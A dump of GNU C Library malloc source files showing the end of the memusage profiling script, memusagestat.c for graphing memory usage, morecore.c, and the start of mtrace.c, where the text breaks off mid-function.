--no-timer) 149 | notimer=yes 150 | ;; 151 | -m | --m | --mm | --mma | --mmap) 152 | tracemmap=yes 153 | ;; 154 | -t | --tim | --time | --time- | --time-b | --time-ba | --time-bas | --time-base | --time-based) 155 | memusagestat_args="$memusagestat_args -t" 156 | ;; 157 | -T | --to | --tot | --tota | --total) 158 | memusagestat_args="$memusagestat_args -T" 159 | ;; 160 | --tit | --titl | --title) 161 | if test $# -eq 1; then 162 | do_missing_arg $1 163 | fi 164 | shift 165 | memusagestat_args="$memusagestat_args -s $1" 166 | ;; 167 | --tit=* | --titl=* | --title=*) 168 | memusagestat_args="$memusagestat_args -s ${1##*=}" 169 | ;; 170 | -x | --x | --x- | --x-s | --x-si | --x-siz | --x-size) 171 | if test $# -eq 1; then 172 | do_missing_arg $1 173 | fi 174 | shift 175 | memusagestat_args="$memusagestat_args -x $1" 176 | ;; 177 | --x=* | --x-=* | --x-s=* | --x-si=* | --x-siz=* | --x-size=*) 178 | memusagestat_args="$memusagestat_args -x ${1##*=}" 179 | ;; 180 | -y | --y | --y- | --y-s | --y-si | --y-siz | --y-size) 181 | if test $# -eq 1; then 182 | do_missing_arg $1 183 | fi 184 | shift 185 | memusagestat_args="$memusagestat_args -y $1" 186 | ;; 187 | --y=* | --y-=* | --y-s=* | --y-si=* | --y-siz=* | --y-size=*) 188 | memusagestat_args="$memusagestat_args -y ${1##*=}" 189 | ;; 190 | --p | --p=* | --t | --t=* | --ti | --ti=* | --u) 191 | echo >&2 $"memusage: option \`${1##*=}' is ambiguous" 192 | do_usage 193 | ;; 194 | --) 195 | # Stop processing arguments. 196 | shift 197 | break 198 | ;; 199 | --*) 200 | echo >&2 $"memusage: unrecognized option \`$1'" 201 | do_usage 202 | ;; 203 | *) 204 | # Unknown option. This means the rest is the program name and parameters. 205 | break 206 | ;; 207 | esac 208 | shift 209 | done 210 | 211 | # See whether any arguments are left. 212 | if test $# -eq 0; then 213 | echo >&2 $"No program name given" 214 | do_usage 215 | fi 216 | 217 | # This will be in the environment. 218 | add_env="LD_PRELOAD=$memusageso" 219 | 220 | # Generate data file name. 221 | datafile= 222 | if test -n "$data"; then 223 | datafile="$data" 224 | elif test -n "$png"; then 225 | datafile=$(mktemp -t memusage.XXXXXX) || exit 226 | trap 'rm -f "$datafile"; exit 1' HUP INT QUIT TERM PIPE 227 | fi 228 | if test -n "$datafile"; then 229 | add_env="$add_env MEMUSAGE_OUTPUT=$datafile" 230 | fi 231 | 232 | # Set program name. 233 | if test -n "$progname"; then 234 | add_env="$add_env MEMUSAGE_PROG_NAME=$progname" 235 | fi 236 | 237 | # Set buffer size. 238 | if test -n "$buffer"; then 239 | add_env="$add_env MEMUSAGE_BUFFER_SIZE=$buffer" 240 | fi 241 | 242 | # Disable timers. 243 | if test -n "$notimer"; then 244 | add_env="$add_env MEMUSAGE_NO_TIMER=yes" 245 | fi 246 | 247 | # Trace mmap. 248 | if test -n "$tracemmap"; then 249 | add_env="$add_env MEMUSAGE_TRACE_MMAP=yes" 250 | fi 251 | 252 | # Execute the program itself. 253 | eval $add_env '"$@"' 254 | result=$? 255 | 256 | # Generate the PNG data file if wanted and there is something to generate 257 | # it from. 258 | if test -n "$png" -a -n "$datafile" -a -s "$datafile"; then 259 | # Append extension .png if it isn't already there. 260 | case $png in 261 | *.png) ;; 262 | *) png="$png.png" ;; 263 | esac 264 | $memusagestat $memusagestat_args "$datafile" "$png" 265 | fi 266 | 267 | if test -z "$data" -a -n "$datafile"; then 268 | rm -f "$datafile" 269 | fi 270 | 271 | exit $result 272 | # Local Variables: 273 | # mode:ksh 274 | # End: 275 | -------------------------------------------------------------------------------- /glibc/malloc/memusagestat.c: -------------------------------------------------------------------------------- 1 | /* Generate graphic from memory profiling data. 2 | Copyright (C) 1998-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | Contributed by Ulrich Drepper , 1998. 5 | 6 | This program is free software; you can redistribute it and/or modify 7 | it under the terms of the GNU General Public License as published 8 | by the Free Software Foundation; version 2 of the License, or 9 | (at your option) any later version. 10 | 11 | This program is distributed in the hope that it will be useful, 12 | but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | GNU General Public License for more details. 15 | 16 | You should have received a copy of the GNU General Public License 17 | along with this program; if not, see . */ 18 | 19 | #define _FILE_OFFSET_BITS 64 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | 37 | #include 38 | #include 39 | #include 40 | 41 | #include "../version.h" 42 | #define PACKAGE _libc_intl_domainname 43 | 44 | /* Default size of the generated image. */ 45 | #define XSIZE 800 46 | #define YSIZE 600 47 | 48 | #ifndef N_ 49 | # define N_(Arg) Arg 50 | #endif 51 | 52 | 53 | /* Definitions of arguments for argp functions. */ 54 | static const struct argp_option options[] = 55 | { 56 | { "output", 'o', N_ ("FILE"), 0, N_ ("Name output file") }, 57 | { "string", 's', N_ ("STRING"), 0, N_ ("Title string used in output graphic") }, 58 | { "time", 't', NULL, 0, N_ ("\ 59 | Generate output linear to time (default is linear to number of function calls)\ 60 | ") }, 61 | { "total", 'T', NULL, 0, 62 | N_ ("Also draw graph for total memory consumption") }, 63 | { "x-size", 'x', N_ ("VALUE"), 0, 64 | N_ ("Make output graphic VALUE pixels wide") }, 65 | { "y-size", 'y', "VALUE", 0, N_ ("Make output graphic VALUE pixels high") }, 66 | { NULL, 0, NULL, 0, NULL } 67 | }; 68 | 69 | /* Short description of program. */ 70 | static const char doc[] = N_ ("Generate graphic from memory profiling data"); 71 | 72 | /* Strings for arguments in help texts. */ 73 | static const char args_doc[] = N_ ("DATAFILE [OUTFILE]"); 74 | 75 | /* Prototype for option handler. */ 76 | static error_t parse_opt (int key, char *arg, struct argp_state *state); 77 | 78 | /* Function to print some extra text in the help message. */ 79 | static char *more_help (int key, const char *text, void *input); 80 | 81 | /* Name and version of program. */ 82 | static void print_version (FILE *stream, struct argp_state *state); 83 | void (*argp_program_version_hook) (FILE *, struct argp_state *) = print_version; 84 | 85 | /* Data structure to communicate with argp functions. */ 86 | static struct argp argp = 87 | { 88 | options, parse_opt, args_doc, doc, NULL, more_help 89 | }; 90 | 91 | 92 | struct entry 93 | { 94 | uint64_t heap; 95 | uint64_t stack; 96 | uint32_t time_low; 97 | uint32_t time_high; 98 | }; 99 | 100 | 101 | /* Size of the image. */ 102 | static size_t xsize; 103 | static size_t ysize; 104 | 105 | /* Name of the output file. */ 106 | static char *outname; 107 | 108 | /* Title string for the graphic. */ 109 | static const char *string; 110 | 111 | /* Nonzero if graph should be generated linear in time. */ 112 | static int time_based; 113 | 114 | /* Nonzero if graph to display total use of memory should be drawn as well. */ 115 | static int also_total = 0; 116 | 117 | 118 | int 119 | main (int argc, char *argv[]) 120 | { 121 | int remaining; 122 | const char *inname; 123 | gdImagePtr im_out; 124 | int grey, blue, red, green, yellow, black; 125 | int fd; 126 | struct stat st; 127 | size_t maxsize_heap; 128 | size_t maxsize_stack; 129 | size_t maxsize_total; 130 | uint64_t total; 131 | uint64_t cnt, cnt2; 132 | FILE *outfile; 133 | char buf[30]; 134 | size_t last_heap; 135 | size_t last_stack; 136 | size_t last_total; 137 | struct entry headent[2]; 138 | uint64_t start_time; 139 | uint64_t end_time; 140 | uint64_t total_time; 141 | const char *heap_format, *stack_format; 142 | int heap_scale, stack_scale, line; 143 | 144 | outname = NULL; 145 | xsize = XSIZE; 146 | ysize = YSIZE; 147 | string = NULL; 148 | 149 | /* Parse and process arguments. */ 150 | argp_parse (&argp, argc, argv, 0, &remaining, NULL); 151 | 152 | if (remaining >= argc || remaining + 2 < argc) 153 | { 154 | argp_help (&argp, stdout, ARGP_HELP_SEE | ARGP_HELP_EXIT_ERR, 155 | program_invocation_short_name); 156 | exit (1); 157 | } 158 | 159 | inname = argv[remaining++]; 160 | 161 | if (remaining < argc) 162 | outname = argv[remaining]; 163 | else if (outname == NULL) 164 | { 165 | size_t len = strlen (inname); 166 | outname = alloca (len + 5); 167 | stpcpy (stpcpy (outname, inname), ".png"); 168 | } 169 | 170 | /* Open for read/write since we try to repair the file in case the 171 | application hasn't terminated cleanly. */ 172 | fd = open (inname, O_RDWR); 173 | if (fd == -1) 174 | error (EXIT_FAILURE, errno, "cannot open input file"); 175 | if (fstat (fd, &st) != 0) 176 | { 177 | close (fd); 178 | error (EXIT_FAILURE, errno, "cannot get size of input file"); 179 | } 180 | /* Test whether the file contains only full records. */ 181 | if ((st.st_size % sizeof (struct entry)) != 0 182 | /* The file must at least contain the two administrative records. */ 183 | || st.st_size < 2 * sizeof (struct entry)) 184 | { 185 | close (fd); 186 | error (EXIT_FAILURE, 0, "input file has incorrect size"); 187 | } 188 | /* Compute number of data entries. */ 189 | total = st.st_size / sizeof (struct entry) - 2; 190 | 191 | /* Read the administrative information. */ 192 | read (fd, headent, sizeof (headent)); 193 | maxsize_heap = headent[1].heap; 194 | maxsize_stack = headent[1].stack; 195 | maxsize_total = headent[0].stack; 196 | 197 | if (maxsize_heap == 0 && maxsize_stack == 0) 198 | { 199 | /* The program aborted before memusage was able to write the 200 | information about the maximum heap and stack use. Repair 201 | the file now. */ 202 | struct entry next; 203 | 204 | while (1) 205 | { 206 | if (read (fd, &next, sizeof (next)) == 0) 207 | break; 208 | if (next.heap > maxsize_heap) 209 | maxsize_heap = next.heap; 210 | if (next.stack > maxsize_stack) 211 | maxsize_stack = next.stack; 212 | if (maxsize_heap + maxsize_stack > maxsize_total) 213 | maxsize_total = maxsize_heap + maxsize_stack; 214 | } 215 | 216 | headent[0].stack = maxsize_total; 217 | headent[1].heap = maxsize_heap; 218 | headent[1].stack = maxsize_stack; 219 | headent[1].time_low = next.time_low; 220 | headent[1].time_high = next.time_high; 221 | 222 | /* Write the computed values in the file. */ 223 | lseek (fd, 0, SEEK_SET); 224 | write (fd, headent, 2 * sizeof (struct entry)); 225 | } 226 | 227 | if (also_total) 228 | { 229 | /* We use one scale and since we also draw the total amount of 230 | memory used we have to adapt the maximum. */ 231 | maxsize_heap = maxsize_total; 232 | maxsize_stack = maxsize_total; 233 | } 234 | 235 | start_time = ((uint64_t) headent[0].time_high) << 32 | headent[0].time_low; 236 | end_time = ((uint64_t) headent[1].time_high) << 32 | headent[1].time_low; 237 | total_time = end_time - start_time; 238 | 239 | if (xsize < 100) 240 | xsize = 100; 241 | if (ysize < 80) 242 | ysize = 80; 243 | 244 | /* Create output image with the specified size. */ 245 | im_out = gdImageCreate (xsize, ysize); 246 | 247 | /* First color allocated is background. */ 248 | grey = gdImageColorAllocate (im_out, 224, 224, 224); 249 | 250 | /* Set transparent color. */ 251 | gdImageColorTransparent (im_out, grey); 252 | 253 | /* These are all the other colors we need (in the moment). */ 254 | red = gdImageColorAllocate (im_out, 255, 0, 0); 255 | green = gdImageColorAllocate (im_out, 0, 130, 0); 256 | blue = gdImageColorAllocate (im_out, 0, 0, 255); 257 | yellow = gdImageColorAllocate (im_out, 154, 205, 50); 258 | black = gdImageColorAllocate (im_out, 0, 0, 0); 259 | 260 | gdImageRectangle (im_out, 40, 20, xsize - 40, ysize - 20, blue); 261 | 262 | if (maxsize_heap < 1024) 263 | { 264 | heap_format = "%Zu"; 265 | heap_scale = 1; 266 | } 267 | else if (maxsize_heap < 1024 * 1024 * 100) 268 | { 269 | heap_format = "%Zuk"; 270 | heap_scale = 1024; 271 | } 272 | else 273 | { 274 | heap_format = "%ZuM"; 275 | heap_scale = 1024 * 1024; 276 | } 277 | 278 | if (maxsize_stack < 1024) 279 | { 280 | stack_format = "%Zu"; 281 | stack_scale = 1; 282 | } 283 | else if (maxsize_stack < 1024 * 1024 * 100) 284 | { 285 | stack_format = "%Zuk"; 286 | stack_scale = 1024; 287 | } 288 | else 289 | { 290 | stack_format = "%ZuM"; 291 | stack_scale = 1024 * 1024; 292 | } 293 | 294 | gdImageString (im_out, gdFontSmall, 38, ysize - 14, (unsigned char *) "0", 295 | blue); 296 | snprintf (buf, sizeof (buf), heap_format, 0); 297 | gdImageString (im_out, gdFontSmall, maxsize_heap < 1024 ? 32 : 26, 298 | ysize - 26, (unsigned char *) buf, red); 299 | snprintf (buf, sizeof (buf), stack_format, 0); 300 | gdImageString (im_out, gdFontSmall, xsize - 37, ysize - 26, 301 | (unsigned char *) buf, green); 302 | 303 | if (string != NULL) 304 | gdImageString (im_out, gdFontLarge, (xsize - strlen (string) * 8) / 2, 305 | 2, (unsigned char *) string, green); 306 | 307 | gdImageStringUp (im_out, gdFontSmall, 1, ysize / 2 - 10, 308 | (unsigned char *) "allocated", red); 309 | gdImageStringUp (im_out, gdFontSmall, 11, ysize / 2 - 10, 310 | (unsigned char *) "memory", red); 311 | 312 | gdImageStringUp (im_out, gdFontSmall, xsize - 39, ysize / 2 - 10, 313 | (unsigned char *) "used", green); 314 | gdImageStringUp (im_out, gdFontSmall, xsize - 27, ysize / 2 - 10, 315 | (unsigned char *) "stack", green); 316 | 317 | snprintf (buf, sizeof (buf), heap_format, maxsize_heap / heap_scale); 318 | gdImageString (im_out, gdFontSmall, 39 - strlen (buf) * 6, 14, 319 | (unsigned char *) buf, red); 320 | snprintf (buf, sizeof (buf), stack_format, maxsize_stack / stack_scale); 321 | gdImageString (im_out, gdFontSmall, xsize - 37, 14, 322 | (unsigned char *) buf, green); 323 | 324 | for (line = 1; line <= 3; ++line) 325 | { 326 | if (maxsize_heap > 0) 327 | { 328 | cnt = (((ysize - 40) * (maxsize_heap / 4 * line / heap_scale)) 329 | / (maxsize_heap / heap_scale)); 330 | gdImageDashedLine (im_out, 40, ysize - 20 - cnt, xsize - 40, 331 | ysize - 20 - cnt, red); 332 | snprintf (buf, sizeof (buf), heap_format, 333 | maxsize_heap / 4 * line / heap_scale); 334 | gdImageString (im_out, gdFontSmall, 39 - strlen (buf) * 6, 335 | ysize - 26 - cnt, (unsigned char *) buf, red); 336 | } 337 | else 338 | cnt = 0; 339 | 340 | if (maxsize_stack > 0) 341 | cnt2 = (((ysize - 40) * (maxsize_stack / 4 * line / stack_scale)) 342 | / (maxsize_stack / stack_scale)); 343 | else 344 | cnt2 = 0; 345 | 346 | if (cnt != cnt2) 347 | gdImageDashedLine (im_out, 40, ysize - 20 - cnt2, xsize - 40, 348 | ysize - 20 - cnt2, green); 349 | snprintf (buf, sizeof (buf), stack_format, maxsize_stack / 4 * line / 350 | stack_scale); 351 | gdImageString (im_out, gdFontSmall, xsize - 37, ysize - 26 - cnt2, 352 | (unsigned char *) buf, green); 353 | } 354 | 355 | snprintf (buf, sizeof (buf), "%llu", (unsigned long long) total); 356 | gdImageString (im_out, gdFontSmall, xsize - 50, ysize - 14, 357 | (unsigned char *) buf, blue); 358 | 359 | if (!time_based) 360 | { 361 | uint64_t previously = start_time; 362 | 363 | gdImageString (im_out, gdFontSmall, 40 + (xsize - 32 * 6 - 80) / 2, 364 | ysize - 12, 365 | (unsigned char *) "# memory handling function calls", 366 | blue); 367 | 368 | 369 | last_stack = last_heap = last_total = ysize - 20; 370 | for (cnt = 1; cnt <= total; ++cnt) 371 | { 372 | struct entry entry; 373 | size_t new[2]; 374 | uint64_t now; 375 | 376 | read (fd, &entry, sizeof (entry)); 377 | 378 | now = ((uint64_t) entry.time_high) << 32 | entry.time_low; 379 | 380 | if ((((previously - start_time) * 100) / total_time) % 10 < 5) 381 | gdImageFilledRectangle (im_out, 382 | 40 + ((cnt - 1) * (xsize - 80)) / total, 383 | ysize - 19, 384 | 39 + (cnt * (xsize - 80)) / total, 385 | ysize - 14, yellow); 386 | previously = now; 387 | 388 | if (also_total && maxsize_heap > 0) 389 | { 390 | size_t new3; 391 | 392 | new3 = (ysize - 20) - ((((unsigned long long int) (ysize - 40)) 393 | * (entry.heap + entry.stack)) 394 | / maxsize_heap); 395 | gdImageLine (im_out, 40 + ((xsize - 80) * (cnt - 1)) / total, 396 | last_total, 397 | 40 + ((xsize - 80) * cnt) / total, new3, 398 | black); 399 | last_total = new3; 400 | } 401 | 402 | if (maxsize_heap > 0) 403 | { 404 | new[0] = ((ysize - 20) 405 | - ((((unsigned long long int) (ysize - 40)) 406 | * entry.heap) / maxsize_heap)); 407 | gdImageLine (im_out, 40 + ((xsize - 80) * (cnt - 1)) / total, 408 | last_heap, 40 + ((xsize - 80) * cnt) / total, 409 | new[0], red); 410 | last_heap = new[0]; 411 | } 412 | 413 | if (maxsize_stack > 0) 414 | { 415 | new[1] = ((ysize - 20) 416 | - ((((unsigned long long int) (ysize - 40)) 417 | * entry.stack) / maxsize_stack)); 418 | gdImageLine (im_out, 40 + ((xsize - 80) * (cnt - 1)) / total, 419 | last_stack, 40 + ((xsize - 80) * cnt) / total, 420 | new[1], green); 421 | last_stack = new[1]; 422 | } 423 | } 424 | 425 | cnt = 0; 426 | while (cnt < total) 427 | { 428 | gdImageLine (im_out, 40 + ((xsize - 80) * cnt) / total, ysize - 20, 429 | 40 + ((xsize - 80) * cnt) / total, ysize - 15, blue); 430 | cnt += MAX (1, total / 20); 431 | } 432 | gdImageLine (im_out, xsize - 40, ysize - 20, xsize - 40, ysize - 15, 433 | blue); 434 | } 435 | else 436 | { 437 | uint64_t next_tick = MAX (1, total / 20); 438 | size_t last_xpos = 40; 439 | 440 | gdImageString (im_out, gdFontSmall, 40 + (xsize - 39 * 6 - 80) / 2, 441 | ysize - 12, 442 | (unsigned char *) " \ 443 | # memory handling function calls / time", blue); 444 | 445 | for (cnt = 0; cnt < 20; cnt += 2) 446 | gdImageFilledRectangle (im_out, 447 | 40 + (cnt * (xsize - 80)) / 20, ysize - 19, 448 | 39 + ((cnt + 1) * (xsize - 80)) / 20, 449 | ysize - 14, yellow); 450 | 451 | last_stack = last_heap = last_total = ysize - 20; 452 | for (cnt = 1; cnt <= total; ++cnt) 453 | { 454 | struct entry entry; 455 | size_t new[2]; 456 | size_t xpos; 457 | uint64_t now; 458 | 459 | read (fd, &entry, sizeof (entry)); 460 | 461 | now = ((uint64_t) entry.time_high) << 32 | entry.time_low; 462 | xpos = 40 + ((xsize - 80) * (now - start_time)) / total_time; 463 | 464 | if (cnt == next_tick) 465 | { 466 | gdImageLine (im_out, xpos, ysize - 20, xpos, ysize - 15, blue); 467 | next_tick += MAX (1, total / 20); 468 | } 469 | 470 | if (also_total && maxsize_heap > 0) 471 | { 472 | size_t new3; 473 | 474 | new3 = (ysize - 20) - ((((unsigned long long int) (ysize - 40)) 475 | * (entry.heap + entry.stack)) 476 | / maxsize_heap); 477 | gdImageLine (im_out, last_xpos, last_total, xpos, new3, black); 478 | last_total = new3; 479 | } 480 | 481 | if (maxsize_heap > 0) 482 | { 483 | new[0] = ((ysize - 20) 484 | - ((((unsigned long long int) (ysize - 40)) 485 | * entry.heap) / maxsize_heap)); 486 | gdImageLine (im_out, last_xpos, last_heap, xpos, new[0], red); 487 | last_heap = new[0]; 488 | } 489 | 490 | if (maxsize_stack > 0) 491 | { 492 | new[1] = ((ysize - 20) 493 | - ((((unsigned long long int) (ysize - 40)) 494 | * entry.stack) / maxsize_stack)); 495 | gdImageLine (im_out, last_xpos, last_stack, xpos, new[1], 496 | green); 497 | last_stack = new[1]; 498 | } 499 | 500 | last_xpos = xpos; 501 | } 502 | } 503 | 504 | /* Write out the result. */ 505 | outfile = fopen (outname, "w"); 506 | if (outfile == NULL) 507 | error (EXIT_FAILURE, errno, "cannot open output file"); 508 | 509 | gdImagePng (im_out, outfile); 510 | 511 | fclose (outfile); 512 | 513 | gdImageDestroy (im_out); 514 | 515 | return 0; 516 | } 517 | 518 | 519 | /* Handle program arguments. */ 520 | static error_t 521 | parse_opt (int key, char *arg, struct argp_state *state) 522 | { 523 | switch (key) 524 | { 525 | case 'o': 526 | outname = arg; 527 | break; 528 | case 's': 529 | string = arg; 530 | break; 531 | case 't': 532 | time_based = 1; 533 | break; 534 | case 'T': 535 | also_total = 1; 536 | break; 537 | case 'x': 538 | xsize = atoi (arg); 539 | if (xsize == 0) 540 | xsize = XSIZE; 541 | break; 542 | case 'y': 543 | ysize = atoi (arg); 544 | if (ysize == 0) 545 | ysize = XSIZE; 546 | break; 547 | default: 548 | return ARGP_ERR_UNKNOWN; 549 | } 550 | return 0; 551 | } 552 | 553 | 554 | static char * 555 | more_help (int key, const char *text, void *input) 556 | { 557 | char *tp; 558 | 559 | switch (key) 560 | { 561 | case ARGP_KEY_HELP_EXTRA: 562 | /* We print some extra information. */ 563 | if (asprintf (&tp, gettext ("\ 564 | For bug reporting instructions, please see:\n\ 565 | %s.\n"), REPORT_BUGS_TO) < 0) 566 | return NULL; 567 | 568 | return tp; 569 | 570 | default: 571 | break; 572 | } 573 | return (char *) text; 574 | } 575 | 576 | /* Print the version information. */ 577 | static void 578 | print_version (FILE *stream, struct argp_state *state) 579 | { 580 | fprintf (stream, "memusagestat %s%s\n", PKGVERSION, VERSION); 581 | fprintf (stream, gettext ("\ 582 | Copyright (C) %s Free Software Foundation, Inc.\n\ 583 | This is free software; see the source for copying conditions. There is NO\n\ 584 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n\ 585 | "), "2014"); 586 | fprintf (stream, gettext ("Written by %s.\n"), "Ulrich Drepper"); 587 | } 588 | -------------------------------------------------------------------------------- /glibc/malloc/morecore.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 1991-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | 4 | The GNU C Library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | The GNU C Library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with the GNU C Library; if not, see 16 | . */ 17 | 18 | #ifndef _MALLOC_INTERNAL 19 | # define _MALLOC_INTERNAL 20 | # include 21 | #endif 22 | 23 | #ifndef __GNU_LIBRARY__ 24 | # define __sbrk sbrk 25 | #endif 26 | 27 | #ifdef __GNU_LIBRARY__ 28 | /* It is best not to declare this and cast its result on foreign operating 29 | systems with potentially hostile include files. */ 30 | 31 | # include 32 | # include 33 | extern void *__sbrk (ptrdiff_t increment) __THROW; 34 | libc_hidden_proto (__sbrk) 35 | #endif 36 | 37 | #ifndef NULL 38 | # define NULL 0 39 | #endif 40 | 41 | /* Allocate INCREMENT more bytes of data space, 42 | and return the start of data space, or NULL on errors. 43 | If INCREMENT is negative, shrink data space. */ 44 | void * 45 | __default_morecore (ptrdiff_t increment) 46 | { 47 | void *result = (void *) __sbrk (increment); 48 | if (result == (void *) -1) 49 | return NULL; 50 | 51 | return result; 52 | } 53 | libc_hidden_def (__default_morecore) 54 | -------------------------------------------------------------------------------- /glibc/malloc/mtrace.c: -------------------------------------------------------------------------------- 1 | /* More debugging hooks for `malloc'. 2 | Copyright (C) 1991-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | Written April 2, 1991 by John Gilmore of Cygnus Support. 5 | Based on mcheck.c by Mike Haertel. 6 | 7 | The GNU C Library is free software; you can redistribute it and/or 8 | modify it under the terms of the GNU Lesser General Public 9 | License as published by the Free Software Foundation; either 10 | version 2.1 of the License, or (at your option) any later version. 11 | 12 | The GNU C Library is distributed in the hope that it will be useful, 13 | but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 15 | Lesser General Public License for more details. 16 | 17 | You should have received a copy of the GNU Lesser General Public 18 | License along with the GNU C Library; if not, see 19 | . */ 20 | 21 | #ifndef _MALLOC_INTERNAL 22 | # define _MALLOC_INTERNAL 23 | # include 24 | # include 25 | # include 26 | #endif 27 | 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | 34 | #include <_itoa.h> 35 | 36 | #include 37 | 38 | #include 39 | #define setvbuf(s, b, f, l) _IO_setvbuf (s, b, f, l) 40 | #define fwrite(buf, size, count, fp) _IO_fwrite (buf, size, count, fp) 41 | 42 | #include 43 | 44 | #define TRACE_BUFFER_SIZE 512 45 | 46 | static FILE *mallstream; 47 | static const char mallenv[] = "MALLOC_TRACE"; 48 | static char *malloc_trace_buffer; 49 | 50 | __libc_lock_define_initialized (static, lock); 51 | 52 | /* Address to breakpoint on accesses to... */ 53 | __ptr_t mallwatch; 54 | 55 | /* Old hook values. */ 56 | static void (*tr_old_free_hook) (__ptr_t ptr, const __ptr_t); 57 | static __ptr_t (*tr_old_malloc_hook) (size_t size, const __ptr_t); 58 | static __ptr_t (*tr_old_realloc_hook) (__ptr_t ptr, size_t size, 59 | const __ptr_t); 60 | static __ptr_t (*tr_old_memalign_hook) (size_t __alignment, size_t __size, 61 | const __ptr_t); 62 | 63 | /* This function is called when the block being alloc'd, realloc'd, or 64 | freed has an address matching the variable "mallwatch". In a debugger, 65 | set "mallwatch" to the address of interest, then put a breakpoint on 66 | tr_break. */ 67 | 68 | extern void tr_break (void) __THROW; 69 | libc_hidden_proto (tr_break) 70 | void 71 | tr_break (void) 72 | { 73 | } 74 | libc_hidden_def (tr_break) 75 | 76 | static void internal_function 77 | tr_where (const __ptr_t caller, Dl_info *info) 78 | { 79 | if (caller != NULL) 80 | { 81 | if (info != NULL) 82 | { 83 | char *buf = (char *) ""; 84 | if (info->dli_sname != NULL) 85 | { 86 | size_t len = strlen (info->dli_sname); 87 | buf = alloca (len + 6 + 2 * sizeof (void *)); 88 | 89 | buf[0] = '('; 90 | __stpcpy (_fitoa (caller >= (const __ptr_t) info->dli_saddr 91 | ? caller - (const __ptr_t) info->dli_saddr 92 | : (const __ptr_t) info->dli_saddr - caller, 93 | __stpcpy (__mempcpy (buf + 1, info->dli_sname, 94 | len), 95 | caller >= (__ptr_t) info->dli_saddr 96 | ? "+0x" : "-0x"), 97 | 16, 0), 98 | ")"); 99 | } 100 | 101 | fprintf (mallstream, "@ %s%s%s[%p] ", 102 | info->dli_fname ? : "", info->dli_fname ? ":" : "", 103 | buf, caller); 104 | } 105 | else 106 | fprintf (mallstream, "@ [%p] ", caller); 107 | } 108 | } 109 | 110 | static Dl_info * 111 | lock_and_info (const __ptr_t caller, Dl_info *mem) 112 | { 113 | if (caller == NULL) 114 | return NULL; 115 | 116 | Dl_info *res = _dl_addr (caller, mem, NULL, NULL) ? mem : NULL; 117 | 118 | __libc_lock_lock (lock); 119 | 120 | return res; 121 | } 122 | 123 | static void 124 | tr_freehook (__ptr_t ptr, const __ptr_t caller) 125 | { 126 | if (ptr == NULL) 127 | return; 128 | 129 | Dl_info mem; 130 | Dl_info *info = lock_and_info (caller, &mem); 131 | tr_where (caller, info); 132 | /* Be sure to print it first. */ 133 | fprintf (mallstream, "- %p\n", ptr); 134 | if (ptr == mallwatch) 135 | { 136 | __libc_lock_unlock (lock); 137 | tr_break (); 138 | __libc_lock_lock (lock); 139 | } 140 | __free_hook = tr_old_free_hook; 141 | if (tr_old_free_hook != NULL) 142 | (*tr_old_free_hook)(ptr, caller); 143 | else 144 | free (ptr); 145 | __free_hook = tr_freehook; 146 | __libc_lock_unlock (lock); 147 | } 148 | 149 | static __ptr_t 150 | tr_mallochook (size_t size, const __ptr_t caller) 151 | { 152 | __ptr_t hdr; 153 | 154 | Dl_info mem; 155 | Dl_info *info = lock_and_info (caller, &mem); 156 | 157 | __malloc_hook = tr_old_malloc_hook; 158 | if (tr_old_malloc_hook != NULL) 159 | hdr = (__ptr_t) (*tr_old_malloc_hook)(size, caller); 160 | else 161 | hdr = (__ptr_t) malloc (size); 162 | __malloc_hook = tr_mallochook; 163 | 164 | tr_where (caller, info); 165 | /* We could be printing a NULL here; that's OK. */ 166 | fprintf (mallstream, "+ %p %#lx\n", hdr, (unsigned long int) size); 167 | 168 | __libc_lock_unlock (lock); 169 | 170 | if (hdr == mallwatch) 171 | tr_break (); 172 | 173 | return hdr; 174 | } 175 | 176 | static __ptr_t 177 | tr_reallochook (__ptr_t ptr, size_t size, const __ptr_t caller) 178 | { 179 | __ptr_t hdr; 180 | 181 | if (ptr == mallwatch) 182 | tr_break (); 183 | 184 | Dl_info mem; 185 | Dl_info *info = lock_and_info (caller, &mem); 186 | 187 | __free_hook = tr_old_free_hook; 188 | __malloc_hook = tr_old_malloc_hook; 189 | __realloc_hook = tr_old_realloc_hook; 190 | if (tr_old_realloc_hook != NULL) 191 | hdr = (__ptr_t) (*tr_old_realloc_hook)(ptr, size, caller); 192 | else 193 | hdr = (__ptr_t) realloc (ptr, size); 194 | __free_hook = tr_freehook; 195 | __malloc_hook = tr_mallochook; 196 | __realloc_hook = tr_reallochook; 197 | 198 | tr_where (caller, info); 199 | if (hdr == NULL) 200 | { 201 | if (size != 0) 202 | /* Failed realloc. */ 203 | fprintf (mallstream, "! %p %#lx\n", ptr, (unsigned long int) size); 204 | else 205 | fprintf (mallstream, "- %p\n", ptr); 206 | } 207 | else if (ptr == NULL) 208 | fprintf (mallstream, "+ %p %#lx\n", hdr, (unsigned long int) size); 209 | else 210 | { 211 | fprintf (mallstream, "< %p\n", ptr); 212 | tr_where (caller, info); 213 | fprintf (mallstream, "> %p %#lx\n", hdr, (unsigned long int) size); 214 | } 215 | 216 | __libc_lock_unlock (lock); 217 | 218 | if (hdr == mallwatch) 219 | tr_break (); 220 | 221 | return hdr; 222 | } 223 | 224 | static __ptr_t 225 | tr_memalignhook (size_t alignment, size_t size, const __ptr_t caller) 226 | { 227 | __ptr_t hdr; 228 | 229 | Dl_info mem; 230 | Dl_info *info = 